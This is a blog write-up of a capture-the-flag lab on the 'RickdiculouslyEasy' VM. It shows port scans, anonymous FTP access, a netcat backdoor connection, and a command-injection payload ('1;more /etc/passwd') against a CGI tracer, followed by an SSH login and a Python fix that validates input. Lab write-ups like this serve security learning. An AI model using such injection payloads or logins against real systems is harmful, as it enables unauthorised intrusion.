Target Machine Intrusion
rickdiculouslyeasy
Port Scan
nmap -sT -A -p1-65535 -T4 -O -sV 192.168.100.129
21
┌──(root㉿mykali)-[/home/rxwkail/Desktop]
└─# ftp 192.168.100.129
Connected to 192.168.100.129.
220 (vsFTPd 3.0.3)
Name (192.168.100.129:rxwkail): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||45948|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt
drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
229 Entering Extended Passive Mode (|||46305|)
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
100% |***************************| 42 0.39 KiB/s 00:00 ETA
226 Transfer complete.
42 bytes received in 00:00 (0.38 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿mykali)-[/home/rxwkail/Desktop]
└─# ls
FLAG.txt
┌──(root㉿mykali)-[/home/rxwkail/Desktop]
└─# cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points
13337
13337/tcp open unknown
| fingerprint-strings:
| NULL:
|_ FLAG:{TheyFoundMyBackDoorMorty}-10Points
9090
9090/tcp open http Cockpit web service 161 or earlier
|_http-title: Did not follow redirect to https://192.168.100.129:9090/
FLAG {There is no Zeus, in your face!} - 10 Points
60000
60000/tcp open tcpwrapped
|_drda-info: ERROR
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
┌──(root㉿mykali)-[/home/rxwkail/Desktop]
└─# nc 192.168.100.129 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
Directory Scan
./dirsearch.py -u http://192.168.100.129
http://192.168.100.129/passwords/
They're Robots Morty! It's ok to shoot them! They're just Robots!
/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*
http://192.168.100.129/cgi-bin/tracertool.cgi
MORTY’S MACHINE TRACER MACHINE
Enter an IP address to trace.
Arbitrary command execution vulnerability: 1;more /etc/passwd
SSH login: ssh -p 22222 Summer@192.168.100.129
Summer@192.168.100.129's password: winter
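A hardened counterpart to the tracertool.cgi input handling tested above, as an added example that is not the VM's own code. It assumes the CGI hands the form value to traceroute through a shell; the function names and the traceroute path are hypothetical.

```python
import ipaddress
import subprocess

# Assumption: location of the traceroute binary on the host.
TRACEROUTE = "/usr/bin/traceroute"


def vulnerable_command_line(user_input: str) -> str:
    """Assumed shape of the flawed CGI: the value is pasted into a shell string.
    Returned only for comparison; it is never executed here."""
    return "traceroute " + user_input


def build_trace_argv(user_input: str) -> list:
    """Validate the form value and return an argv list for traceroute.

    IPv4Address() accepts only a dotted-quad literal, so spaces, ';', '|',
    '$()' and option-like values starting with '-' all raise ValueError.
    """
    addr = ipaddress.IPv4Address(user_input.strip())
    # -n: numeric output only, no reverse DNS lookups.
    return [TRACEROUTE, "-n", str(addr)]


def run_trace(user_input: str, timeout: int = 30) -> str:
    """Run traceroute without a shell; reject anything that is not an IPv4 address."""
    try:
        argv = build_trace_argv(user_input)
    except ValueError:
        return "Invalid IP address."
    try:
        # A list argv with the default shell=False means no shell parses the
        # value, so metacharacters would have no meaning even if one got through.
        proc = subprocess.run(argv, capture_output=True, text=True,
                              timeout=timeout, check=False)
    except (OSError, subprocess.TimeoutExpired):
        return "Trace failed."
    return proc.stdout


if __name__ == "__main__":
    # Constructed inputs: the value from the walkthrough and a plain address.
    for value in ("1;more /etc/passwd", "192.168.100.129"):
        print(repr(value), "->", repr(vulnerable_command_line(value)))
        try:
            print("  argv:", build_trace_argv(value))
        except ValueError as exc:
            print("  rejected:", exc)
```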
- Title: Target Machine Intrusion
- Author: Rxw
- Created at : 2024-08-08 02:47:12
- Updated at : 2024-12-02 16:42:10
- Link: https://rxw2023-github-io.pages.dev/2024/08/08/靶机入侵/
- License: This work is licensed under CC BY-NC-SA 4.0.